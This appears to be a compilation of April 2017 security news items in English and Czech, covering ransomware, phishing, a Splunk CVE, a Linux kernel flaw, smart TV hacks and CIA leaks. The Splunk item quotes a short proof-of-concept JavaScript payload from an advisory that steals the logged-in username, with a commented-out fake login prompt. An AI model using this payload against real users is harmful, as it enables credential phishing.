GDPR and insurance: it will be essential to know whether the company is in possession of Sensitive Data according to the expanded definition of the new Regulation, in which country and which measures it adopts to defend against data breach. If the company’s own or Third-Party Sensitive Data are entrusted to a third party, it shall be necessary to analyse the existing contracts with the relevant supplier and check the contractual indemnities, in order to transfer the cost of the GDPR mandatory actions correctly. If the company writes or customises code, the extent of the corporate (professional, general, product) liability is to be assessed quite thoroughly;

Simulate the impact of a Cyber adverse event on the bottom line, in terms of cost increases and loss of gross profit. This is maybe the most critical and underestimated field, one that is known to insurers as Business Interruption.

To conclude, it is clear that the Cyber Risk Management approach must be based on a close cooperation between the corporate risk owners and the CIO and CFO and on a virtuous supply chain that includes customers and suppliers, the help of IT professionals expert in Cyber Security management and implementation and brokers expert on cyber matters who can support the Company in the choice of the right balance between costs and insurance guarantees.

Contents on http://www.clusit.it/rapportoclusit

Get the full report contacting rapporti@clusit.it

Copyright 2017 @ CLUSIT

All rights reserved to the authors of the Opera and Clusit

Any reproduction even partial publishing without the written permission of CLUSIT is forbidden.


Social Media Passwords Provide Easy Route into Corporate Networks

3.4.2017 securityweek Social
A combination of 'security fatigue' among users and inadequate password controls among the social media giants is providing a large attack vector for cybercriminals. This is the conclusion of a newly published survey that queried more than 250 security professionals at the RSA Conference in San Francisco in February 2017.

The survey (PDF), conducted by Thycotic, found that password hygiene is severely lacking even among security professionals. It found, for example, that 50% of security professionals have not changed their social network passwords for a year or more, and 20% have never changed them. When this is coupled with social networks not enforcing their own security options, the result is a weak underbelly for criminals to get into corporate networks.

"As we know," said Joseph Carson, Chief Security Scientist at Thycotic, "social networks give away a lot of private information. For people to not consider changing their passwords on a regular basis on their Facebook, Twitter and LinkedIn accounts, they are easily allowing hackers to access information that will grant them access to other facets of their lives, like their work computers and email. Not only is this a huge vulnerability, but this is also a flaw within large social networks that don't remind or make it clear and transparent to the user about the age or strength of the password or best practices."

It is a combination of factors that creates the problem. Users still use weak passwords and reuse them across multiple accounts. Thirty percent of the security professional respondents have used or are still using birthdays, addresses, pet names or children' names for their work passwords -- and all of these are easily crackable.

The problem is made worse by the increasing use of social media logons, where separate internet services allow users to log on with their Facebook, LinkedIn or Twitter password. "Social Logins creates a major security risk because it becomes the master key for all other accounts," Carson told SecurityWeek. "The problem stems further because it is not a proper vault and is used for more than just social logins -- such as for communication, email, browsing and online shopping -- so it is easily targeted and exploited."

One concerning implication from this survey is that user awareness training cannot solve the problem. The poor password practices of the respondents, said Carson, "is an indication that even security professionals continue to use weak passwords for social accounts and that cyber awareness training and cyber hygiene still has a lot of room for improvement. Much of this is a result of cyber fatigue and lack of built-in automation for social accounts."

According to Verizon's 2016 Data Breach Investigations Report, 63% of confirmed data breaches involved weak, default or stolen passwords. "The use of stolen, weak or default credentials in breaches is not new, is not bleeding edge, is not glamorous, but boy howdy it works," the DBIR says.

Forrester Research puts the breach figure even higher, estimating in its 'Forrester Wave: Privileged Identity Management, Q3 2016' report that up to 80% of breaches involve the abuse of privileged accounts. Thycotic's own research indicates that use of passwords as the primary authentication control is still growing, estimating that the 90 billion passwords currently in use will grow to 300 billion by 2020.

Carson does not believe that the solution can simply be awareness training and improved password practices. "There is no such thing as an uncrackable password," Carson told SecurityWeek; "but you can make it very difficult with the computing power plus time to crack the password -- which can deter the attacker from even trying to crack the password. In most cases, it is easier for the attacker to ask the user to tell them the password via phishing scams."

But the big takeaway from Thycotic's survey is that users -- even those users who should know better -- simply are not making it hard for the criminals. Coupled with the disinclination of social media giants to enforce strong access requirements, social media is providing an easy route into employees' accounts; and from there into corporate privileged accounts. Users, suggests Thycotic, cannot be relied upon to protect their passwords, making technology-based privileged account management an absolute necessity.


Android Ransomware Employs Advanced Evasion Techniques

3.4.2017 securityweek Virus

A newly discovered Android ransomware family employs heavy obfuscation and delayed activation of malicious functionality to ensure it can evade anti-virus solutions, Zscaler security researchers warn.

The malware was found hidden inside the repackaged Russian entertainment social network app OK, which the malware author disassembled to insert malicious code, researchers say. The good news, however, is that the legitimate variant of OK, which has over 50 million downloads in Google Play, hasn’t been compromised.

The first evasion technique leveraged by the mobile threat involves kicking off the malicious activity four hours after the initial installation. Most detection mechanisms expect malware to immediately start operation, meaning that this ransomware won’t be immediately detected.

After the four hours have passed, however, users are prompted to activate device administrator rights for the application. Users can’t dismiss the activation screen and clicking the “Cancel” button won’t help either, because the screen is immediately re-displayed until admin rights are enabled, the security researchers reveal.

As soon as this happens, the malicious app locks the device’s screen and displays a ransom note, informing users that their data has been encrypted and sent to the attacker’s servers. Users are urged to pay a 500 Rubles ransom to restore data and unlock the device. The attackers also attempt to scare users into paying by claiming that they would send a message to all of the victim’s contacts to inform them that the device has been “blocked for viewing child pornography.”

According to Zscaler, however, the malware does not exfiltrate any of the victims’ data, and it has no means of unlocking the compromised device. Although the rasnomware does inform the command and control (C&C) server of the new victim, it has no mechanism to confirm that the ransom was paid, meaning that the device remains locked regardless of victim’s willingness to pay or not.

In addition to the delayed start of malicious activities, the ransomware’s malicious code is highly obfuscated. “Almost all strings, method names, variable names, and class names are disguised in such a way that it's extremely difficult to understand the code. Most of these methods are invoked using Java reflection technique, which allows the author to evade static analysis detection,” Zscaler says.

To stay protected from this threat, users are advised to avoid installing applications from third-party app stores. Those who were already infected should reboot the device in Safe Mode, remove the application’s admin rights, then uninstall it and reboot the device in normal mode.

Based on the use of advanced stealth tactics in this ransomware, Zscaler says that the malware author could be able to successfully upload its creation to the Google Play application storefront, although they haven’t so far.


Japan plans to develop a hack-proof satellite system
3.4.2017 securityaffairs BigBrothers

Japan plan to develop a hack proof satellite system to protect transmissions between satellites and ground stations with a dynamic encryption of data.
Japan’s Internal Affairs and Communications Ministry plans to develop a communications system to protect satellites from cyber attacks.

The hack proof satellite system will protect transmissions between satellites and ground stations implementing a dynamic encryption of data.

“With the proposed plan, the government aims to establish a secure communications network that is unique to Japan, for domestic security purposes and to spur investment in the private-sector aerospace industry.” reported the Watertown Daily Times.

The ambitious project of a hack proof satellite system is led by the National Institute of Information and Communications Technology under the jurisdiction of the ministry, it will involve government, industry and academic institutions. The goal is to propose the system for commercial purposes in five to 10 years, the communications ministry aims to have an advantage in the industry by developing a secure communications system that operates in the private sector (i.e. Companies, organizations) will be able to use at a low cost.

The final decision on the hack proof satellite system will be taken this summer, funds for its activities will be included in the budget plan for fiscal 2018.

Cyber attacks represent a serious threat to satellite communications, satellites have a crucial role in our digital society, almost every industry is benefiting from their services for this reason their security is a pillar of the cyber security strategy of governments worldwide.

Attackers are posing a growing challenge to satellite operators, more exposed are commercial satellites that lack the level of security for the military. Security researchers are warning about possible effects of a successful attack against satellite systems and are urging to building them with a security by design approach.

Satellites communicate with terrestrial base stations using radio waves, hackers can intercept with unpredictable consequences.

Hackers who can decode the encrypted data can steal information, manipulate it or take the control of the satellite.

Governments consider realistic the threat of a cyber attack launched by a nation-state actor, a criminal organization and even by a lone hacker. The principal concerns are related to the operation conducted by Chinese hackers, likely state-sponsored attackers, that in the past have already breached the security of US satellites.

hack proof satellite system

In August, the Chinese government launched the world’s first quantum satellite, which will help it establish “hack-proof” communications between space and the ground.

Alleged state-sponsored hackers interfered with the operations of two U.S. government satellites in 2007 and 2008 obtaining access through a ground station in Norway. The satellites were used for climate monitoring.

The hackers “achieved all steps required to command” the Terra AM-1 satellite, but did not control it. An attacker with command privileges could “deny or degrade as well as forges or otherwise manipulate the satellite’s transmission,” or simply damage or otherwise destroy the satellite.

The project of the Japanese Government is to install a code generator on satellites so they can dynamically encrypt data.

“The dynamic codes will be sent to the ground base station using light beams. As the encryption is dynamic, it is more difficult for hackers to decode data even if they are able to intercept transmissions.” continues the Water Town daily Times.

The code generator is a small cube (approximately 10 centimeters on each side) that could be easily installed on a micro satellite being developed by a start-up firm, which is approximately 30-40 centimeters on each side.


Svět není připraven na nové kybernetické hrozby, varoval bezpečnostní expert

3.4.2017 Novinky/Bezpečnost Kyber
Způsob vedení válek se změnil a země světa se zatím neumí vypořádat s novými metodami útoků, které jsou vedeny po internetu. Nejnebezpečnější útoky přitom nevedou jednotlivci, ale přímo státy, často ve spolupráci se zločineckými organizacemi. Řekl to izraelský odborník na kybernetickou bezpečnost Lior Tabansky, který se v Praze minulý týden zúčastnil konference o mezinárodní bezpečnosti.
"Vznikly nové způsoby, jak vést válku," řekl specialista, který působí v úřadu pro kybernetickou bezpečnost spadajícím pod izraelskou vládu. Hackerské útoky, jako bylo nedávno odhalené napadení e-mailů českého ministerstva zahraničí, přitom podle něj nejsou tím hlavním rizikem. "To je tradiční špionáž, je to běžné a jsou i způsoby, jak omezit rizika. Mnohem větší obavu mám z destruktivních útoků, které kybernetické technologie umožňují," řekl.

Podle Tabanského je už nyní možné přes internet napadnout a fyzicky ochromit základní průmyslovou infrastrukturu států.

"Víme, jak se bránit proti konvenčním zbraním, máme prostředky, jak útočníky odstrašit. Ale na kybernetické útoky zatím nejsme připraveni. Tento způsob útoku obchází naši obranu, což je nezdravá situace a znamená, že stojíme proti velmi vážné hrozbě," řekl Tabansky.

Útoky, za kterými stojí státy
Nejvážnějším rizikem jsou podle Tabanského útoky organizované jednotlivými státy. "Často ale spolupracují s organizovaným zločinem pro vzájemný prospěch, takže je těžší než v minulosti rozlišovat mezi nimi," upozornil.

O tom, z jakého regionu hrozby nejčastěji přichází, přímo nemluvil, naznačil však, kdo pravděpodobně zájem na vedení kybernetického konfliktu nemá. "Zkušenost nám ukazuje, že země, které jsou nyní silné a kontrolují světový řád, nejsou ty, které by vyvíjely nástroje pro jeho rozbíjení. Zájem na tom mají spíš země, kterým současné uspořádání nevyhovuje," řekl.

Země světa se podle Tabanského musí zaměřit na vývoj nových obranných konceptů, které budou schopny na kybernetické hrozby reagovat. Upozornil ale, že se tím vytváří dilema mezi právem na ochranu a právem na soukromí. "Pokud chceme chránit kybernetické systémy, musíme je sledovat, vědět, co se v nich děje. A to samozřejmě vytváří konflikt se základními lidskými svobodami," řekl.

Mezinárodní spolupráce v obraně proti kybernetickým hrozbám je podle Tabanského jen omezená, a to i když jsou země součástí obranných aliancí. "Jsou tu jisté limity v tom, co chce jedna strana sdílet s tou druhou. I když jste členem mezinárodní aliance, většina odpovědnosti za národní bezpečnost zůstává na národních úřadech," řekl.


Microsoft is Shutting Down CodePlex, Asks Devs To Move To GitHub
3.4.2017 thehackernews IT
Microsoft has announced to shut down CodePlex -- its website for hosting repositories of open-source software projects -- on December 15, 2017.
Launched in 2006, CodePlex was one of the Microsoft's biggest steps towards the world of open source community -- where any programmer, anywhere can share the code for their software or download and tweak the code to their liking.
However, Microsoft says that the service has dramatically fallen in usage and that fewer than 350 projects seeing a source code commit over the last 30 days, pointing to GitHub as the "de-facto place for open source sharing."
GitHub – 'Facebook for Programmers'
In a blog post published Friday, Microsoft Corporate VP Brian Harry wrote that the shutdown of CodePlex is because the open source community has almost entirely moved over to GitHub, which provides similar functionality for sharing code that people can collaborate on.
"Over the years, we have seen a lot of amazing options come and go but at this point, GitHub is the de-facto place for open source sharing, and most open source projects have migrated there," says Harry.
According to the company, Github has become the "Facebook for programmers," so "it's time to say goodbye to CodePlex."
For now, Microsoft has disabled the ability to create new projects on CodePlex, and in October the site will be turned into a read-only archive.
The complete shutdown comes on December 15 this year, at which point the CodePlex website will be archived indefinitely.
"You will also be able to download an archive file with your project contents, all in common, transferable formats like Markdown and JSON," Harry writes.
"Where possible, we will put in place redirects so that existing URLs work, or at least redirect you to the project's new homepage on the archive. And, the archive will respect your "I've moved" setting, if you used it, to direct users to the current home of your project."
Migrate your Code and Related Projects to GitHub
Harry also points out that many of Microsoft's open source software projects have already found their way to GitHub and the company is actively recommending people to do so.
The company is itself using GitHub to host open-source software projects such as PowerShell, .NET and its Chakra JavaScript engine.
Microsoft is making the process of migration easier for its users. Microsoft has teamed up with GitHub to create a "streamlined" migration tool to help developers shift their code and related content over to GitHub.
Since a release date of the migration tool is not yet known, users can check out the guide on CodePlex for any help with migrating to GitHub.


No Prizes Awarded in Google's Android Hacking Contest

3.4.2017 thehackernews Android

Google reported last week that its Project Zero Prize contest was not as successful as the company hoped it would be – no valid Android exploits were submitted and no prizes were awarded.

In September, Google announced the start of a six-month Android hacking contest that invited researchers to submit serious vulnerabilities and exploit chains. The first winning entry was offered $200,000, and the second would have received $100,000. Other entries were promised at least $50,000.

While some research teams and individuals informed the company of their intention to take part in the contest, ultimately, no one submitted any valid bugs, said Google Project Zero’s Natalie Silvanovich. Some vulnerability reports were submitted, but they were not eligible for a reward under the rules of the Project Zero Prize.

Google believes three main factors led to the lack of entries. One of them was the level of difficulty – hackers were required to find a full exploit chain that allowed remote code execution on up-to-date Nexus 6P and Nexus 5X devices by knowing only their email address and phone number. The targeted user could only open an email in Gmail or an SMS in Messenger.

Project Zero Prize participants were encouraged to submit partial exploits during the contest as the rules only allowed the first submitter to use a certain vulnerability during the contest.

“We expected these rules to encourage participants to file any bugs they found immediately, as only the first finder could use a specific bug, and multiple reports of the same Android bug are fairly common,” Silvanovich explained. “Instead, some participants chose to save their bugs for other contests that had lower prize amounts but allowed user interaction, and accept the risk that someone else might report them in the meantime.”

The tech giant also believes the prizes offered in the contest may have been too small for the types of vulnerabilities that were required. For example, zero-day acquisition firm Zerodium also offers up to $200,000 for Android rooting exploits and they can fetch much more on the black market.

While this contest was not a success, researchers do find plenty of vulnerabilities in Android. Google revealed recently that it paid out roughly $1 million for Android flaws reported last year through its vulnerability reward program.


Attackers can siphon data from Splunk Enterprise if an authenticated user visits a malicious webpage
3.4.2017 thehackernews Vulnerebility

Splunk has fixed the security issue in the JavaScript implementation, tracked as CVE-2017-5607, that can be exploited to siphon data.
Splunk has fixed the security issue in the JavaScript implementation, tracked as CVE-2017-5607, that leaks user information. Splunk provides the leading platform for Operational Intelligence that is used to search, monitor, analyze and visualize machine data. Splunk Enterprise, collects and analyzes high volumes of machine-generated data.

Splunk

The security issue could be exploited by an attacker tricking an authenticated user into visiting a malicious Web page. The bug leaks the username, and whether that user has enabled remote access, allowing an attacker to target the user with a spear phishing attack to steal the user’s credentials.

“Attackers can siphon information from Splunk Enterprise if an authenticated Splunk user visits a malicious webpage. Some useful data gained is the currently logged in username and if remote user setting is enabled.” reads the advisory published at Full Disclosure. “After, the username can be use to Phish or Brute Force Splunk Enterprise login. Additional information stolen may aid in furthering attacks.

Root cause is the global Window JS variable assignment of config?autoload=1 ‘$C’.”

The problem resides in the way Splunk uses Object prototypes in JavaScript. The Object prototype is an Object that every other object inherits from in JavaScript.

“To steal information we simply can define a function to be called when the ‘$C’ JS property is “set” on webpage, for example. Object.defineProperty( Object.prototype, “$C”, { set:function(val){…” continues the advisory,

Below the proof-of-concept JavaScript code published in the advisory:

<script>
Object.defineProperty( Object.prototype, “$C”, { set:function(val){
//prompt(“Splunk Timed out:\nPlease Login to Splunk\nUsername:
“+val.USERNAME, “Password”)
for(var i in val){
alert(“”+i+” “+val[i]);
}
}
});
</script>

Affected Splunk Enterprise versions are:

6.5.x before 6.5.3
6.4.x before 6.4.6
6.3.x before 6.3.10
6.2.x before 6.2.13.1
6.1.x before 6.1.13
6.0.x before 6.0.14
5.0.x before 5.0.18 and Splunk Light before 6.5.2


Linux Kernel vulnerability CVE-2017-7184 disclosed at Pwn2Own 2017 fixed
3.4.2017 securityaffairs Vulnerebility

The Linux kernel flaw exploited by the hackers at the Zero Day Initiative’s Pwn2Own 2017 competition to hack Ubuntu has been patched.
The Chaitin Security Research Lab (@ChaitinTech) discovered a Linux Kernel flaw, , tracked as CVE-2017-7184, during the last Pwn2Own 2017 competition. The experts hacked Ubuntu Desktop exploiting a Linux kernel heap out-of-bound access and earned $15,000 and 3 Master of Pwn points. It was the first time for an Ubuntu Linux hack at the Pwn2Own.

“This vulnerability allows local attackers to execute arbitrary code on vulnerable installations of the Linux Kernel. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability.” reads the ZDI advisory.

“The specific flaw exists within the handling of xfrm states. The issue results from the lack of proper validation of user-supplied data, which can result in a memory access past the end of an allocated buffer. An attacker can leverage this vulnerability to elevate privileges and execute arbitrary code under the context of the kernel.”

Linux Kernel Flaw CVE-2017-7184 Pwn2Own 2017

The vulnerability can be exploited to cause a denial-of-service (DoS) condition or to execute arbitrary code. It could be exploited by a local attacker to escalate privileges on the system.

Red Hat rated the flaw as “high severity,” anyway its experts confirmed that the flaw cannot be exploited for privilege escalation on default or common configurations of Red Hat Enterprise Linux 5, 6 and 7.

The CVE-2017-718 flaw was quickly fixed in the Linux kernel a few days after the Pwn2Own 2017 competition, and Ubuntu development team has fixed it at the end of March. Other Linux distributions are already working on security patches.


Phishing campaigns target airline consumers seeking business credentials
3.4.2017 securityaffairs Phishing

A series of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.
A wave string of phishing campaigns is targeting airline consumers with messages crafted to trick victims into handing over personal or business credentials.

The phishing messages pretend to be sent from a travel agency or a someone inside the target firm, they include a weaponized document or embed a malicious link.

“Over the past several weeks, we have seen a combination of attack techniques. One, where an attacker impersonates a travel agency or someone inside a company. Recipients are told an email contains an airline ticket or e-ticket,” explained Asaf Cidon, vice president, content security services at Barracuda Networks.


According to Barracuda Networks, aviation-themed phishing attacks contain links to spoofed airline sites, threat actors personalize the phishing page in a way to trick victims into providing business information.

The attackers show a deep knowledge of the targets, hackers are targeting logistic, manufacturing and shipping industries.

“It’s clear there is some degree of advanced reconnaissance that takes place before targeting individuals within these companies,” Cidon added.

Recently the U.S. Computer Emergency Readiness Team issued an alert of phishing campaigns targeting airline consumers.

“US-CERT has received reports of email-based phishing campaigns targeting airline consumers. Systems infected through phishing campaigns act as an entry point for attackers to gain access to sensitive business or personal information.” reads the US-CERT warning.

“US-CERT encourages users and administrators to review an airline Security Advisory(link is external) and US-CERT’s Security Tip ST04-014 for more information on phishing attacks.”

The US-CERT specifically references the security advisory published by Delta Air Lines that warned its consumers of fraudulent activities.

“Delta has received reports of attempts by parties not affiliated with us to fraudulently gather customer information in a number of ways including: fraudulent emails, social media sites, postcards, Gift Card promotional websites claiming to be from Delta Air Lines and letters or prize notifications promising free travel,” states the Delta Air Lines warning.

Barracuda confirmed that these campaigns have a high success rate:

“Our analysis shows that for the airline phishing attack, attackers are successful over 90 percent of the time in getting employees to open airline impersonation emails,” concluded Cidon. “This is one of the highest success rates for phishing attacks.”


Forcepoint spotted the modular Felismus RAT, it appears the work of skilled professionals
2.4.2017 securityaffairs Virus

Malware researchers at Forcepoint have discovered a new modular malicious code, dubbed Felismus RAT, that appears the work of skilled professionals.
Malware researchers at Forcepoint have discovered a new modular malicious code dubbed Felismus RAT. The malware has been used in highly targeted campaigns, experts believe the Felismus RAT is the work of skilled professionals.

The malware implements sophisticated evasion technique and anti-analysis features (i.e. Advanced encryption of network communications, the malware uses at least three separate encryption methods depending on the type of message), Forcepoint experts noticed a good ‘operational hygiene’ of the threat actor, it avoided re-use of email addresses and other traceable artifacts for its campaigns.

The Felismus RAT implements a self-updating capability, it is currently able to evade a large number of antivirus solutions. The malicious code implements the typical features of RATs, such as file upload, file download, file execution, and shell (cmd.exe) command execution.

The malicious code can also create text files on the infected machine.

The researchers started the investigation on the Felismus RAT working on available samples feature filenames mimicking that of Adobe’s Content Management System (AdobeCMS.exe). These samples were detected several weeks ago, but the cyber attacks leveraging this malware can be dated six months before.

“The primary samples examined appear in the wild with filenames mimicking that of Adobe’s Content Management System [1] and offers a range of commands typical of Remote Access Tools: file upload, file download, file execution, and command execution.” reads the analysis published by Forcepoint. “Analysis shows the malware overall to be modular, well-written, and to go to great lengths to hinder both analysis efforts and the content of its communications. Its apparent scarcity in the wild implies that it is likely highly targeted. Furthermore, as discussed in this analysis, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts similarly suggests the work of coordinated professionals.”

The experts are still investigating the attacks leveraging the RAT that is believed to be part of a larger campaign.

The command and control (C&C) infrastructure appears still active.

“Visiting cosecman[]com reveals what appears to be a copy of the WordPress.org website, albeit with a stylesheet error in all browsers tested.” continues the analysis.

Felismus RAT

The researchers noticed the threat actors did not reuse the email addresses to register the domains involved in their campaigns.

“The malware analysed appears to be both modular and well-written, strongly suggesting that skilled attackers are responsible, while its apparent scarcity in the wild implies that it is likely highly targeted.”concluded the analysis. “On top of this, the good ‘operational hygiene’ relating to the re-use of email addresses and other similarly traceable artefacts suggests coordinated, professional actors and, at the time of writing, there is little to link it with any known campaigns (APT-linked or otherwise),”

Some typo errors in the folder name and in the function name ‘GetCurrtenUserName’ suggest that the authors might not be Anglo-Saxons.

The researchers discovered that the available malware samples appear to have been compiled using a December 2014 version of the open-source TDM-GCC compiler suite.

The researchers added that one of the C&C IP addresses appeared to selectively block one of the security firm’s exit IPs during research.

“If the other modules and capabilities associated with the malware remain a matter of speculation, so too do the intended target(s). Of the five domains hosted on the C&C IP address identified within this post, three – cosecman[]com, nasomember[]com, and unmailhome[]com – have potential associations with the financial services sector; however, under this theory the naming of the remaining two domains – maibars[]com and mastalib[]com – remain unexplained,” Forcepoint concludes.


95,000 job seekers affected by the McDonald’s Canada data breach
2.4.2017 securityaffairs Crime

The McDonald’s Canada career website was recently subject to a cyber-attack. Hackers stole records of 95,000 job seekers.
McDonald’s Canada confirmed that hackers have stolen the personal data of about 95,000 job seekers from its recruitment website.

The data were provided by candidates searching for a job at McDonald’s Canada since March 2014. The company has launched an investigation into the data breach that exposed job candidates’ names, addresses, emails, telephone numbers, employment histories and other personal data.

“The McDonald’s Canada (“McDonald’s”) career website (http://www.mcdonalds.ca/ca/en/careers.html or http://www.mcdonalds.ca/ca/fr/careers.html) was recently subject to a cyber-attack.” reads the data breach notification published by the company.

“As a result, the personal information of approximately 95,000 restaurant job applicants has been compromised. Applicants affected are those who applied online for a job at a McDonald’s Canada restaurant between March 2014 and March 2017. “

McDonald's Canada

McDonald’s Canada has shut down the recruitment website, fortunately the company doesn’t request sensitive data such as health information, social insurance numbers and financial information.

The company confirmed that it is not aware of any abuse of the stolen data.

“The careers webpage will remain shut down until the investigation is complete and appropriate measures are taken to ensure that this type of security breach does not happen again,” continues the breach notification.


Většinu televizorů mohou napadnout hackeři. Poměrně snadno

2.4.2017 Novinky/Bezpečnost Rizika
Chytré televizory jsou fenoménem dnešní doby. Je spíše výjimkou, pokud v obchodech narazíte na modely, které nenabízí připojení k internetu a možnost instalace aplikací. Daní za atraktivnější funkce je však větší bezpečnostní riziko, jak upozornil server The Hacker News. Podle něj mohou hackeři na dálku napadnout drtivou většinu aktuálně používaných TV.
Zabezpečení počítačů v dnešní době podceňuje málokdo. V případě televizorů to však neplatí, přestože nejrůznější antiviry se pro tato zařízení nabízejí již několik let. Většina uživatelů si totiž patrně neuvědomuje rizika, která jsou však reálná.

V polovině loňského roku se například roztrhl pytel s vyděračskými viry, které uzamkly televizor. Za jeho odemčení pak kyberzločinci požadovali výkupné. Útok tedy probíhal podle stejného scénáře, jako kdyby byl napaden obyčejný počítač. 

Škodlivé kódy jsou přitom kyberzločinci schopni šířit přímo pomocí televizního vysílání. Jak upozornil server The Hacker News, jsou schopni zneužít technologii zvanou HbbTV (Hybrid Broadcast Broadband TV). Jde v podstatě o technologii hybridního vysílání, které propojuje klasické televizní vysílání s internetovým připojením.

TV nasměrují na podvodné stránky
K čemu to slouží v praxi? Například při sledování nějakého programu se uživateli zobrazí nabídka doplňujících informací – přímo na TV lze zobrazit související obsah, jako jsou fotografie, text, audio či video. HbbTV umožňuje také přístup k internetovým archivům a internetovým televizním stanicím.

Zneužít tuto technologii mohu počítačoví piráti k tomu, aby televizory nasměrovaly na podvodné stránky se škodlivými viry. Uživatelé, kteří nepoužívají žádný bezpečnostní software, pak nemohou poznat, že je něco v nepořádku. Tedy alespoň do doby, než hackeři převezmou kontrolu nad jejich přístroji.

Je také důležité zmínit, že k žádnému podobnému útoku na televizory nedošlo. Bezpečnostní výzkumníci však v praxi ukázali, že to není vůbec nemožné. S ohledem na to, že technologii HbbTV nabízí drtivá většina moderních televizorů, není radno možná rizika podceňovat.

Armáda zotročených zařízení
Na televizory a další domácí zařízení s připojením k internetu se počítačoví piráti zaměřují vcelku pravidelně. Právě kvůli slabému zabezpečení. Řeč je například o rekordérech, meteorologických stanicích, kamerách, termostatech, ale klidně také o chytrých žárovkách, u kterých je možné prostřednictvím počítačové sítě upravovat teplotu světla.

Když má k dispozici celou armádu podobných zařízení, může s jejich pomocí klidně libovolnou webovou stránku vyřadit z provozu. Jednoduše na ní přesměruje takový počet požadavků, že je server nezvládne zpracovat a zhroutí se. Přesně jak tomu bylo minulý rok při útoku na francouzskou společnost OVH. 

Právě výpadky OVH jsou dosud popisovány jako největší DDoS útok v historii internetu. Měl intenzitu 1 Tb/s. To je pro lepší představu tak velká zátěž, že by ji neustála ani celá řada větších tuzemských serverů.


Over 85% Of Smart TVs Can Be Hacked Remotely Using Broadcasting Signals
2.4.2017 thehackernews IoT

The Internet-connected devices are growing at an exponential rate, and so are threats to them.
Due to the insecure implementation, a majority of Internet-connected embedded devices, including Smart TVs, Refrigerators, Microwaves, Security Cameras, and printers, are routinely being hacked and used as weapons in cyber attacks.
We have seen IoT botnets like Mirai – possibly the biggest IoT-based malware threat that emerged late last year and caused vast internet outage by launching massive DDoS attacks against DynDNS provider – which proves how easy it is to hack these connected devices.
Now, a security researcher is warning of another IoT threat involving Smart TVs that could allow hackers to take complete control of a wide range of Smart TVs at once without having any physical access to any of them.
Researcher Shows Live Hacking Demonstration

The proof-of-concept exploit for the attack, developed by Rafael Scheel of cyber security firm Oneconsult, uses a low-cost transmitter for embedding malicious commands into a rogue DVB-T (Digital Video Broadcasting — Terrestrial) signals.
Those rogue signals are then broadcast to nearby devices, allowing attackers to gain root access on the Smart TVs, and using those devices for nasty actions, such as launching DDoS attacks and spying on end users.
Scheel provided a live hacking demonstration of the attack during a presentation at the European Broadcasting Union (EBU) Media Cyber Security Seminar, saying about 90 percent of the Smart TVs sold in the last years are potential victims of similar attacks.
Scheel's exploit relies on a transmitter based on DVB-T — a transmission standard that's built into TVs that are connected to the Internet.
The attack exploits two known privilege escalation vulnerabilities in the web browsers running in the background and once compromised, attackers could remotely connect to the TV over the Internet using interfaces, allowing them to take complete control of the device.
Once compromised, the TV would be infected in a way that neither device reboots nor factory resets would help the victims get rid of the infection.

Scheel's exploit is unique and much more dangerous than any smart TV hack we have seen so far.
Previous Smart TV hacks, including Weeping Angel (described in the CIA leaked documents), required physical access to the targeted device or relied on social engineering, which exposes hackers to the risk of being caught as well as limits the number of devices that can be hacked.
However, Scheel's exploit eliminates the need for hackers to gain physical control of the device and can work against a vast majority of TV sets at once.
The hack once again underlines the risks of "Internet of Things" devices. Since the IoT devices are rapidly growing and changing the way we use technology, it drastically expands the attack surface, and when viewed from the vantage point of information security, IoT can be frightening.


German Military to Launch the Bundeswehr’s new Cyber and Information Space Command
2.4.2017 securityaffairs  BigBrothers

Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command.
Today the German Military is going to launch a cyber command, the Bundeswehr’s new Cyber and Information Space (CIR) Command, a structure that is considered strategic for the defence of the country from cyber attacks.

According to the new commander, Lieutenant General Ludwig Leinhos, Germany is taking a leading role among the members of the NATO alliance.

“Leinhos said the main tasks would be to operate and protect the military’s own IT infrastructure and computer-assisted weapons systems, as well as surveillance of online threats.” reported the Reuters agency.

The German Government intends to protect its critical infrastructure and its assets from cyber attacks. The German military fears cyber espionage and sabotage.

The Bundeswehr’s new Cyber and Information Space (CIR) Command, will be composed of 260 IT specialists, but the Government plans to increase its staff up to 13,500 military and civilian personnel by July.

The General Ludwig Leinhos confirmed that the centre will be tasked to develop offensive cyber capabilities.

“He said the centre would also develop and war-game offensive capabilities because “in order to be able to defend yourself, you have to know the options for attack”.” continues the Reuters.

The operations conducted by the Cyber and Information Space (CIR) Command would have to be approved by the German Parliament, this means that cyber operations are considered equal to conventional military missions.

The creation of the centre is the response to the numerous attacks suffered by the German Government, last year the Bundestag was hit by numerous attacks.


In June, German media reported that Bundestag may need to replace 20,000 computers after hackers breached the Bundestag systems.

According to the Der Spiegel magazine, security experts involved in the investigation on the attack against the Bundestag suspect that the hack was part of a large-scale espionage campaign conducted by Russians state-sponsored hackers.

The German defense ministry said that in the first nine weeks of 2017, the IT systems of the Bundeswehr had been hit by more than 280,000 attacks.

“we are in a constant race between the development of attack options and defensive capabilities” concluded Leinhos.


WikiLeaks Reveals the Marble framework, used by the CIA to make hard the attribution
2.4.2017 securityaffairs BigBrothers

WikiLeaks has published the third batch of documents dubbed Marble that revealed the CIA anti-forensics tool dubbed Marble framework.
WikiLeaks released the third batch of the CIA Vault7 archive that shed light the anti-forensics tools used by the intelligence Agency,

The first tranche of CIA documents from Vault7 was related to hacking tools and techniques, while the second batch included detailed info about hacking tools specifically designed to hack SmartTV, Android handhelds, Apple iPhones, Macs and Windows systems.

This third lot of documents, dubbed Mable, includes the source code files for the anti-forensic Marble Framework. It contains 676 source code files of a secret anti-forensic Marble Framework.

The experts from the CIA have developed the Marble Framework to make hard forensics activities on its malicious codes.

The code used by the CIA was able to evade detection implementing various techniques, for example, it is able to detect if the code runs in virtual machine sandbox.

The Marble platform makes hard the attribution of the attacks, the documents show how CIA can conduct a cyber attack in a way experts attributed it to other countries, including Russia, China, North Korea and Iran.

“Today, March 31st 2017, WikiLeaks releases Vault 7 “Marble” — 676 source code files for the CIA’s secret anti-forensic Marble Framework. Marble is used to hamper forensic investigators and anti-virus companies from attributing viruses, trojans and hacking attacks to the CIA.” reads Wikileaks.

“Marble does this by hiding (“obfuscating”) text fragments used in CIA malware from visual inspection. This is the digital equivallent of a specalized CIA tool to place covers over the english language text on U.S. produced weapons systems before giving them to insurgents secretly backed by the CIA.”

Marble framework wikileaks

